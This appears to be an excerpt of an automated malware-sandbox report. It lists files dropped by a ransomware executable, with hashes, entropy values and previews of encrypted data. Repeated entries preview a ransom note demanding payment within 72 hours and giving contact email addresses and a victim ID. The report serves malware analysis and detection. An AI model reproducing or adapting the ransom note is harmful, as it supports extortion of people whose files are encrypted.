                                                                                                                                              Preview:...)$.b.H.rJ."..8...:Z.<|W.D...Il......}.7:.lpl.rlH...........?.x.e.z....^M.>.~..\..q..YR}.8.9.)G.~c.T;3.D..%w.$AE..s.?.a...@.8..T|..Sco...MB.-....4.,T.C.jFd.A....'.c........s...9l.GL....z-....F.....{.v.b.i...Q..Q....5.$_.....w..E. .B..6.7....;.,...R..F.....O).....!.bV..b.]dG.F..v.~.e.y;.....)#..%F...""..n.l..c._..#I1h2..Q.m.,7ST...^N...v...c,:..P.\....iXH6.....[.^..r.(5.ifn(1..u.....W....%.z.vH..}..-.....J.....Z....m...'..\.n....h]A.k.2\.S.....Y..S..........yO.h.'u.NG..|....4Z.@.`e.....~<Lu/.....hmts..~i4.:...a>.<.......}...."....."@."t.A..g..T....#y'...s,t..cA. C...rI=....~s..).....T.h.`G.....W#.t..rz........?...(.7.br.y......A&.~.~]......M.....J...=j.....k.^....F36..Y.z...;.....2TwNo.Y,.&A.....@[..li]u.K..J.g,Iw...}..:.0...a..F8..>..s.....T..q3.'.1;.C.4...~.,.2.nt.E.......}...&..../........WYJ?...Mh/.].......+..LQ..4.D>P......[;*x.!Z!.M.8{"..i.3I7.+....U.......r.K..]..VR...H........%.j.7..=!..& .r.....5...jZG..2}'....Ch.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.86728718460517
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:BemuJgcDfy69iyfIyXJ7oGeTyb3JFoB6P6M4AjQvbgn/IaeHC8dihKaZS:Be/D19ieIyXJ7oGemNWB6Pwvbgn/iSVo
                                                                                                                                              MD5:B2E233C87550800C3465B9B8A12CC306
                                                                                                                                              SHA1:D7B20AE4CBE135BD895B52E13F7EEB01A1477A96
                                                                                                                                              SHA-256:6C30F009CBE8A85C3820B58AB10E269CB23E2DA881EE7B7A1052819C3A8C4203
                                                                                                                                              SHA-512:F39BDEA10CA4D5109F5A8AAE061F6BAB121ECB1A36956936D10EB22782ADFC6963D2BA7911F015CF2AA16FC99B820928B9D42C13545094B1564214EEE337F8F1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...g....[..>......%.| ..4E....+.N!..'.x.gL.#...... .............f...JTZH...(..Y._....BD..>X..D...&..%.g..`wcA.U.2k.l?.....hw.{....ax.\x..4zP.r.....A....=".)..3Y. ...y.....i1=.p.O%.?..b......=....4...L..N..b..~...~..e.t.E.9..}^.n.......@...*P./......[h..K.3N._4.a..J...x..$t.I..x]h...P.s.v..{~.G=q.I.....e...].W-S..;...{.4......v....L....A.....8.H.ofj..t.iq}...qd(#.....+S0...\..v....(r!.}..V5i.^+..;...m<.V..R.M... ~$}$.yrb.Q.....>..{..'..4ut.c.Q .a.U..9.o.&g..KV.....@.a.v".:.80....j..M(...q3...AM.B5...=..A..1!....8 ......<.U>.[YG.Y4.B.X@.2'.E[..fl.i.".;.........dN.-m..".2....Cx...Z...6..uj#..;>'.}K.....$..P.A"C?~E..../..P...R.N...k.5w...u@.U|VF.v.._-'F.B.B.&.~.I..@.}/..p..,....a}!f.#.PU..\2v..V$.:G.a_....z...,..m.V.R@.azS...&.]..W,....#.}I....?.{Z.5)y..|.Q..o|1..S4t...qH.$&S...|3.m"!V.}.G.?J...............<.f...V.R?.1.E[#stPku).;uJt.?...........)..c.L..0.....&...._1 Tee..(..Q.......(h.+*.....{/X.i0.G"...>.......'...s.=.K/..y...0.A.....bd
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.86728718460517
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:BemuJgcDfy69iyfIyXJ7oGeTyb3JFoB6P6M4AjQvbgn/IaeHC8dihKaZS:Be/D19ieIyXJ7oGemNWB6Pwvbgn/iSVo
                                                                                                                                              MD5:B2E233C87550800C3465B9B8A12CC306
                                                                                                                                              SHA1:D7B20AE4CBE135BD895B52E13F7EEB01A1477A96
                                                                                                                                              SHA-256:6C30F009CBE8A85C3820B58AB10E269CB23E2DA881EE7B7A1052819C3A8C4203
                                                                                                                                              SHA-512:F39BDEA10CA4D5109F5A8AAE061F6BAB121ECB1A36956936D10EB22782ADFC6963D2BA7911F015CF2AA16FC99B820928B9D42C13545094B1564214EEE337F8F1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...g....[..>......%.| ..4E....+.N!..'.x.gL.#...... .............f...JTZH...(..Y._....BD..>X..D...&..%.g..`wcA.U.2k.l?.....hw.{....ax.\x..4zP.r.....A....=".)..3Y. ...y.....i1=.p.O%.?..b......=....4...L..N..b..~...~..e.t.E.9..}^.n.......@...*P./......[h..K.3N._4.a..J...x..$t.I..x]h...P.s.v..{~.G=q.I.....e...].W-S..;...{.4......v....L....A.....8.H.ofj..t.iq}...qd(#.....+S0...\..v....(r!.}..V5i.^+..;...m<.V..R.M... ~$}$.yrb.Q.....>..{..'..4ut.c.Q .a.U..9.o.&g..KV.....@.a.v".:.80....j..M(...q3...AM.B5...=..A..1!....8 ......<.U>.[YG.Y4.B.X@.2'.E[..fl.i.".;.........dN.-m..".2....Cx...Z...6..uj#..;>'.}K.....$..P.A"C?~E..../..P...R.N...k.5w...u@.U|VF.v.._-'F.B.B.&.~.I..@.}/..p..,....a}!f.#.PU..\2v..V$.:G.a_....z...,..m.V.R@.azS...&.]..W,....#.}I....?.{Z.5)y..|.Q..o|1..S4t...qH.$&S...|3.m"!V.}.G.?J...............<.f...V.R?.1.E[#stPku).;uJt.?...........)..c.L..0.....&...._1 Tee..(..Q.......(h.+*.....{/X.i0.G"...>.......'...s.=.K/..y...0.A.....bd
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.81799626701526
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Wei9/cjtgYK1RarBwAtnxh0DJv2i0GTnIBwQLro4qAMseJa8Dl5ruA2mYtwsK:Weqcj9Lh0Dt2i0GTnTQLrngJaaTrHhp
                                                                                                                                              MD5:061F75E4EAF44BB18BC960B8557C1167
                                                                                                                                              SHA1:9107D7650B17FABAFB235FA9EECB1E46FB8DF28B
                                                                                                                                              SHA-256:276C560F4BF121B754345A7A451EFF795D261EA5CD463E744C523883729BDFB1
                                                                                                                                              SHA-512:EBA10B89FC7348E802145C995133B00A2BE0A1935A23936E39919D48EFF391AB1812BA161CC861BA7E5DBBEE1D64804C73C871B5ABF9C33B09AE193219D9D367
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:C5..6:...#..J....B`.k..8}....:@.E.;.6u....9h..%A......C..T.{.}I..B.*..]..tYl....4.....R.F...........4..l.>.....w...G.......w...B...$..~.7yLW(.N.C.2\..*....._.0/u.{Z.......Y....i.....x....o.A.YM.)..k.D...u...pv...}0. .....@.j....>._.Do.^L..F......M...$z.....t..9..N..o[.C.p..c.u.......).....khi..|....f.....:#9.WE..}.EY9..M.=.GM....].CD}..}Ok;....v..4.Q.1..296.B#..'.......vu..X..m.S.1..Ho.*.W.....H..k........l-..W..2+/<....Y.O..X..o..`AF.r\7.Fp...vK-....wco...O;.t.LY...!4g..O|.....%,...._|..A....8..E.D..4.D...cHG-.B5....:...N..M2C.*"E.......(..wM....."vo.....d_#....]N. ..75...2&n...5..S]..~.(&.uN"..p.]#.$.rG5.{B.*;..u.f....$..=K$g...Y.V..5.....7.K.bW...z.=.O..b...(.sN".s..Of?...M..Z:..uPc....T.0XAy..if.e.(.._h..q.LKKC......5...5..p...5.Dx..<.....|.Y7..t-.@.Y....$&.6..]..6..9..eZ.\...o7..y....U.w..;...x.51....u.Q.,...l..>.&.........j...j`.V..|z....AI.....2..M$..+.t..(..x7...c.....2..%...T.e^=.....Q. 3'6....k..<..".......!E,......,.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.81799626701526
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Wei9/cjtgYK1RarBwAtnxh0DJv2i0GTnIBwQLro4qAMseJa8Dl5ruA2mYtwsK:Weqcj9Lh0Dt2i0GTnTQLrngJaaTrHhp
                                                                                                                                              MD5:061F75E4EAF44BB18BC960B8557C1167
                                                                                                                                              SHA1:9107D7650B17FABAFB235FA9EECB1E46FB8DF28B
                                                                                                                                              SHA-256:276C560F4BF121B754345A7A451EFF795D261EA5CD463E744C523883729BDFB1
                                                                                                                                              SHA-512:EBA10B89FC7348E802145C995133B00A2BE0A1935A23936E39919D48EFF391AB1812BA161CC861BA7E5DBBEE1D64804C73C871B5ABF9C33B09AE193219D9D367
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:C5..6:...#..J....B`.k..8}....:@.E.;.6u....9h..%A......C..T.{.}I..B.*..]..tYl....4.....R.F...........4..l.>.....w...G.......w...B...$..~.7yLW(.N.C.2\..*....._.0/u.{Z.......Y....i.....x....o.A.YM.)..k.D...u...pv...}0. .....@.j....>._.Do.^L..F......M...$z.....t..9..N..o[.C.p..c.u.......).....khi..|....f.....:#9.WE..}.EY9..M.=.GM....].CD}..}Ok;....v..4.Q.1..296.B#..'.......vu..X..m.S.1..Ho.*.W.....H..k........l-..W..2+/<....Y.O..X..o..`AF.r\7.Fp...vK-....wco...O;.t.LY...!4g..O|.....%,...._|..A....8..E.D..4.D...cHG-.B5....:...N..M2C.*"E.......(..wM....."vo.....d_#....]N. ..75...2&n...5..S]..~.(&.uN"..p.]#.$.rG5.{B.*;..u.f....$..=K$g...Y.V..5.....7.K.bW...z.=.O..b...(.sN".s..Of?...M..Z:..uPc....T.0XAy..if.e.(.._h..q.LKKC......5...5..p...5.Dx..<.....|.Y7..t-.@.Y....$&.6..]..6..9..eZ.\...o7..y....U.w..;...x.51....u.Q.,...l..>.&.........j...j`.V..|z....AI.....2..M$..+.t..(..x7...c.....2..%...T.e^=.....Q. 3'6....k..<..".......!E,......,.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1203
                                                                                                                                              Entropy (8bit):7.861235286393097
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:w391AIPg8AnCuA9SRkaVFAAbwTxuqWBK05MUKToyC8frG7vxNHqIx5wJw:w3sxRC/QC8wTYqNFpfSxkJw
                                                                                                                                              MD5:FA14F0F45649345E65D57B367B019B29
                                                                                                                                              SHA1:FB2260D4451DAF090F40BE1B1512F13C60D7F6CC
                                                                                                                                              SHA-256:0BCA55A8E8F6B9EE7BEB55CDBAEED44A521FE4CBCBF0C68AEC2DDA7497967416
                                                                                                                                              SHA-512:34BAC577A20368C7FC21D93183A3050A2FED2F62C3B6515D9B59783913A03D52F8B5C7612968D2513A2322ED13DA528E1C4AD5C72AE2F9BCB53CF21FA25B9A64
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.seq...w9.+..\.Sz.-.{.....O6....8..3..,S.....B.R..;..\.SN....4.i>.12!Im.......b...2.....".s.m..H.....u.......(KU%..v.e\......M....YAK'..:|7.=1%Y..l...o;@..<....1.O......U......b."..*.....:..C...r..s~[.O..m....|.&'R..T.v....jd....>..87...rl1..Rn..^.~UI=.C..'.0m.V...>~...x.1.._.....o...fA....^....t[..K..$A.Y....D....2...K/D..M9......A+...q.].C.......o..H....... v...\!8..;*.....G=.....L?..C'.r.....8.fo.j].....3A8?....vA..m.la...Hbg....=;D...F...%..W.q.}w=.l?..,V....*A....MhUB..}.".&...x9?.l.Y.A..}..(1.,Xs...y?=.[...i..la[=iJHc......'.Z+..o..t..@...M.....3...P.]|..F.d.j.T...b.....n..&...:Lb....N..6W ..u.f..3...r.R.........6..c.N.......2...#=.Q...v..p..p.......b..:..R.x.(.).#.<.5....`..]<$.:..$...3w...&ab65{..r....!..7....... mo..}..j....A......D...p..2z..~.W...$w7.D...0z.(..W.@...4...t..i..3>.+c.?.B..(..r.g.B~.D....c~.9.<.H.J..@'FX.J...&&.l.!.6/....@.US....tA....IE.......k.?.!e.p...N= Nothing...a..D[!..9.......97....Y.......p...\..&...`..lS{.JW6.^.e.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1203
                                                                                                                                              Entropy (8bit):7.861235286393097
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:w391AIPg8AnCuA9SRkaVFAAbwTxuqWBK05MUKToyC8frG7vxNHqIx5wJw:w3sxRC/QC8wTYqNFpfSxkJw
                                                                                                                                              MD5:FA14F0F45649345E65D57B367B019B29
                                                                                                                                              SHA1:FB2260D4451DAF090F40BE1B1512F13C60D7F6CC
                                                                                                                                              SHA-256:0BCA55A8E8F6B9EE7BEB55CDBAEED44A521FE4CBCBF0C68AEC2DDA7497967416
                                                                                                                                              SHA-512:34BAC577A20368C7FC21D93183A3050A2FED2F62C3B6515D9B59783913A03D52F8B5C7612968D2513A2322ED13DA528E1C4AD5C72AE2F9BCB53CF21FA25B9A64
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.seq...w9.+..\.Sz.-.{.....O6....8..3..,S.....B.R..;..\.SN....4.i>.12!Im.......b...2.....".s.m..H.....u.......(KU%..v.e\......M....YAK'..:|7.=1%Y..l...o;@..<....1.O......U......b."..*.....:..C...r..s~[.O..m....|.&'R..T.v....jd....>..87...rl1..Rn..^.~UI=.C..'.0m.V...>~...x.1.._.....o...fA....^....t[..K..$A.Y....D....2...K/D..M9......A+...q.].C.......o..H....... v...\!8..;*.....G=.....L?..C'.r.....8.fo.j].....3A8?....vA..m.la...Hbg....=;D...F...%..W.q.}w=.l?..,V....*A....MhUB..}.".&...x9?.l.Y.A..}..(1.,Xs...y?=.[...i..la[=iJHc......'.Z+..o..t..@...M.....3...P.]|..F.d.j.T...b.....n..&...:Lb....N..6W ..u.f..3...r.R.........6..c.N.......2...#=.Q...v..p..p.......b..:..R.x.(.).#.<.5....`..]<$.:..$...3w...&ab65{..r....!..7....... mo..}..j....A......D...p..2z..~.W...$w7.D...0z.(..W.@...4...t..i..3>.+c.?.B..(..r.g.B~.D....c~.9.<.H.J..@'FX.J...&&.l.!.6/....@.US....tA....IE.......k.?.!e.p...N= Nothing...a..D[!..9.......97....Y.......p...\..&...`..lS{.JW6.^.e.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.816187973357837
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:cHPFCiYFEmfptj9j9kbGZb7PNNYEJdFVrIKxJMoaqY3ep5f21tbl:CFCvxtBffMbKxeq1pB+h
                                                                                                                                              MD5:77D1D836EB699BAF71FFD9F25F4214BF
                                                                                                                                              SHA1:3A7F0F2FC667E3090DE86D6BFE3DE295EECF8DF3
                                                                                                                                              SHA-256:B726902E317A0891FC21976CFD64B2EE08A1A75D7A22FF85EEE546EB092DEBA5
                                                                                                                                              SHA-512:416856E4E3C76CCFDC14C894CB2F9C4288FBC97DE3032364FF80F2F1BC75B8ACF4AFAAB8BFD43E3C17D87B249FF3C6380B4BA5E8C3307E4DF60A92A99147C505
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..3"w.....]./..#A]q5...%........3.h.K.t.'.M..B..x..[........toJ...[.....|../.(.v.!X2.....A}~........?.a.i.X..YXqn....wrx]....5M....8.2 w._.%~l..........96....A..M...A.....D.......[P8....;U?q..2U..0.................'....S.+M.1...8k.{.H........w{..v..z.!$...6.L..(......o.....aW.o.-:.wW..!H..%.*.M\F6X..e..4.IN.YY.!.H...$_.I.I.D^.6#...v...Q.b{.n3.Z.....n...*.e...K?H....y.T*.w.K.k"j.u.5{o...#\.c.W..z.M.;..7......K...).Q...K.x..bFO......\W.6u4...7(..........&.]...L..+.:...a.|Y. ..~[x.....o;.Hw;8.F.8..3..$.2......x.wL7..nrU=....1....+C{.%..CT.u......]{[v.j.....UO..,w.,f.{.P..Qu.....%~U....c.Y.g......qk0.q.a#3.X..Y...Z.Iw.f?Z.^...m|1.c.Y....3.2.....f..5..e.:...FQl4....!..7/.....HX.5.m.j,..).Fh...k.W.B..,a.(..u........6k.h=j......>/1'.....k..,.3.........W.M..W.L'M..c..~.\?.,.s...L...Y2.h.5;.......E......r"j..-.....eO..a^.o.R.DZ.+I........B...f.y.d.X...M....a......-..'a".N..&...,&..G.Gh...7..6....}g.O.W#...&K..;..=3..a.Q..{.....b....-W.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.816187973357837
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:cHPFCiYFEmfptj9j9kbGZb7PNNYEJdFVrIKxJMoaqY3ep5f21tbl:CFCvxtBffMbKxeq1pB+h
                                                                                                                                              MD5:77D1D836EB699BAF71FFD9F25F4214BF
                                                                                                                                              SHA1:3A7F0F2FC667E3090DE86D6BFE3DE295EECF8DF3
                                                                                                                                              SHA-256:B726902E317A0891FC21976CFD64B2EE08A1A75D7A22FF85EEE546EB092DEBA5
                                                                                                                                              SHA-512:416856E4E3C76CCFDC14C894CB2F9C4288FBC97DE3032364FF80F2F1BC75B8ACF4AFAAB8BFD43E3C17D87B249FF3C6380B4BA5E8C3307E4DF60A92A99147C505
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..3"w.....]./..#A]q5...%........3.h.K.t.'.M..B..x..[........toJ...[.....|../.(.v.!X2.....A}~........?.a.i.X..YXqn....wrx]....5M....8.2 w._.%~l..........96....A..M...A.....D.......[P8....;U?q..2U..0.................'....S.+M.1...8k.{.H........w{..v..z.!$...6.L..(......o.....aW.o.-:.wW..!H..%.*.M\F6X..e..4.IN.YY.!.H...$_.I.I.D^.6#...v...Q.b{.n3.Z.....n...*.e...K?H....y.T*.w.K.k"j.u.5{o...#\.c.W..z.M.;..7......K...).Q...K.x..bFO......\W.6u4...7(..........&.]...L..+.:...a.|Y. ..~[x.....o;.Hw;8.F.8..3..$.2......x.wL7..nrU=....1....+C{.%..CT.u......]{[v.j.....UO..,w.,f.{.P..Qu.....%~U....c.Y.g......qk0.q.a#3.X..Y...Z.Iw.f?Z.^...m|1.c.Y....3.2.....f..5..e.:...FQl4....!..7/.....HX.5.m.j,..).Fh...k.W.B..,a.(..u........6k.h=j......>/1'.....k..,.3.........W.M..W.L'M..c..~.\?.,.s...L...Y2.h.5;.......E......r"j..-.....eO..a^.o.R.DZ.+I........B...f.y.d.X...M....a......-..'a".N..&...,&..G.Gh...7..6....}g.O.W#...&K..;..=3..a.Q..{.....b....-W.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.844832584674077
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:YlC/k0qPcCdtRWZ3ppGX0/1jUemQeGz4YZXT4Yvqzhjp4QVXfIrNQulT4/N8:pTqP7tRWZ3pkX2RUem+z4YHCzZpfwZTv
                                                                                                                                              MD5:FF4BA875C2EA77C968E643F1A27493C1
                                                                                                                                              SHA1:E2AEEBC14F45E13D97CF6CCB7D9B660200CDA02F
                                                                                                                                              SHA-256:BF5BF905B06BE2973B8A70F62062B9013322592B3928A8DD77EC9F8574C43EA6
                                                                                                                                              SHA-512:9096225D892FC39FA35DB87694ACCAA6AD0530FDCB3E6AF4563A1E91502746C2093D03B867ADE09E59DC80DDDB364F850CF2131AFCD6D99E4BDF9F0A2BC82193
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:I...a...!Y.?....."..Rg....+..8.....Hu.....y~-.a..#C.B....e.OeN.IS......w.bZ(d....B..Zp?3..*......"6.....A..C.." . .h.#.+.....8..H.,..0.."Z..f.g.......Pr'a.<.......ix......~y...'...P..(.o..ha....y..A.!.$...g.Lf.......J.....4.4=.(GF..L..A.h........L.+..HMe."........C......8W..v..t.9.9..\.Y..4d.ze..%.*U...e.....O....>.z..E.e..c.L......D.V......S...v.....B.w..H........:?l.a....U...5Eg.c.*.Q'..B....U..z.H.......K.bk;.4........S.....C.A..K..1.2.g..x...&......}d....*.9T.q.........YV:...n...5..T..w.dpA...(L_.W..$Q..)CV.7Q..Q.t.....E.pu3..T.....XT.W.lx.HB..!...K...*4{ Le.>.P..8.K.$.YHk<.....%6..u...H..i`.......4e..q.uU>.p ....qt}V.J.}.-a.Y...&.....5..O...B.l...,J..Y.}.`.'....<.'.,b. ..d..l(.....(....]ri....tf.WM"$C.Fi...4...}C..vPf.......{@...]...5.KoY..74........C....lBun.0T.=\..u....}%f...:.?...k..=,N.;..FW.R.....KD.e.~..x..cgG(...6.c.0.E.N7[..7.pBx0.....2.S.!.......f.o3..5..j5A.u...F?..n...>...O...>.wc.eu..l..L.+...^dL..........I.oF
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.844832584674077
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:YlC/k0qPcCdtRWZ3ppGX0/1jUemQeGz4YZXT4Yvqzhjp4QVXfIrNQulT4/N8:pTqP7tRWZ3pkX2RUem+z4YHCzZpfwZTv
                                                                                                                                              MD5:FF4BA875C2EA77C968E643F1A27493C1
                                                                                                                                              SHA1:E2AEEBC14F45E13D97CF6CCB7D9B660200CDA02F
                                                                                                                                              SHA-256:BF5BF905B06BE2973B8A70F62062B9013322592B3928A8DD77EC9F8574C43EA6
                                                                                                                                              SHA-512:9096225D892FC39FA35DB87694ACCAA6AD0530FDCB3E6AF4563A1E91502746C2093D03B867ADE09E59DC80DDDB364F850CF2131AFCD6D99E4BDF9F0A2BC82193
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:I...a...!Y.?....."..Rg....+..8.....Hu.....y~-.a..#C.B....e.OeN.IS......w.bZ(d....B..Zp?3..*......"6.....A..C.." . .h.#.+.....8..H.,..0.."Z..f.g.......Pr'a.<.......ix......~y...'...P..(.o..ha....y..A.!.$...g.Lf.......J.....4.4=.(GF..L..A.h........L.+..HMe."........C......8W..v..t.9.9..\.Y..4d.ze..%.*U...e.....O....>.z..E.e..c.L......D.V......S...v.....B.w..H........:?l.a....U...5Eg.c.*.Q'..B....U..z.H.......K.bk;.4........S.....C.A..K..1.2.g..x...&......}d....*.9T.q.........YV:...n...5..T..w.dpA...(L_.W..$Q..)CV.7Q..Q.t.....E.pu3..T.....XT.W.lx.HB..!...K...*4{ Le.>.P..8.K.$.YHk<.....%6..u...H..i`.......4e..q.uU>.p ....qt}V.J.}.-a.Y...&.....5..O...B.l...,J..Y.}.`.'....<.'.,b. ..d..l(.....(....]ri....tf.WM"$C.Fi...4...}C..vPf.......{@...]...5.KoY..74........C....lBun.0T.=\..u....}%f...:.?...k..=,N.;..FW.R.....KD.e.~..x..cgG(...6.c.0.E.N7[..7.pBx0.....2.S.!.......f.o3..5..j5A.u...F?..n...>...O...>.wc.eu..l..L.+...^dL..........I.oF
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.853781237636782
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:YTbQHRdw+BR6APGBi0SHu7mHoTrMPX7GxTMww7yEMOx4D7wYgHim7c4ui6p:Yn/++APki0S8mMMPX7KIww93x4D7KPbs
                                                                                                                                              MD5:F736A5A3605DF342746E043850F24E56
                                                                                                                                              SHA1:9702F70217D74E5AE6191123373B604566AC90AA
                                                                                                                                              SHA-256:063CBBE36AEA7889B1FDD7FBCB7F0C18764B15DB14DEFE0E3A375C926FE09B3C
                                                                                                                                              SHA-512:D34C2AB27EDFCB71A6FA59AB4A2CB72EFD8DA66E6793B6AD873AE763E2F97E5EF6EA87DA2E9D14E61DD33C78EF7424B0676711285BBCA70CD1B5A61FAE1FF803
                                                                                                                                              Malicious:false
